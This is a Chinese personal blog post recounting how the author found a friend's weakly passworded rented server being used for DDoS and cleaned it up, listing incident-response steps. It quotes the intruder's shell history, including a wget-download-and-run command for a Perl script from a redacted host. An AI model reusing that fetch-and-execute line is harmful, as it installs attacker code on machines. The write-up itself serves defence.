網站伺服器被駭(hack)了怎麼辦?

今天中午吃飯到一半收到主機商寄來的信

Please review the following abuse complaint and provide us with a resolution:

An IP address (XXX.XXX.XXX.XXX) under your control appears to have attacked one of our customers as part of a coordinated DDoS botnet. We manually reviewed the captures from this attack and do not believe that your IP address was spoofed, based on the limited number of distinct hosts attacking us, the identicality of many attacking IP addresses to ones we’ve seen in the past, and the non-random distribution of IP addresses.
…………..

原來幫朋友租的主機被駭了然後正在DDoS別人,簡單記錄一下處理流程

  1. 檢查使用者有無異常
  2. 檢查正在執行的程序有無異常
  3. 發現有一使用者正在執行異常程序
  4. 將該使用者執行程序KILL掉
  5. 將該使用者帳號暫停
  6. 分析LOG檔(auth.log)找出正常使用者不正常的部分
  7. 分析使用者目錄下的bash執行記錄
  8. 找到禍源

幫朋友租的機器,管理權限通通給他,不過今天會發生這樣的事情也是因為他的密碼設置太過簡單,還好只是個子帳號沒有root權限,但是這樣也害的我帳號被警告了一次,請朋友先轉移資料自己開過吧 Orz

ls
cd /var/tmp
perl
cd /tmp && wget http://XXX.XXX.XXX/XXX/XXX/perl-auto.pl && perl perl-auto.pl && rm -rf perl-auto.pl

不過,上面 hacker 留下來記錄的那隻 rootkit script我就收下來當紀念拉XD

解決後回報,主機商也想了解怎麼處理,請我回覆,回覆後確認也沒再發生這件事就這樣落幕。不過整件事都沒有主機商的責任,實在都是人為,且朋友的資安觀念還需加強。

開機器開服務容易,但是做好服務其實就沒這麼簡單了

Facebook 功能:

Share:
  • 能不能多寫一點防止被駭的文章壓

    謝謝!

    • 好呦! 有碰到一些案例就會來記錄一下,不然實在有太多技術細節要寫了XD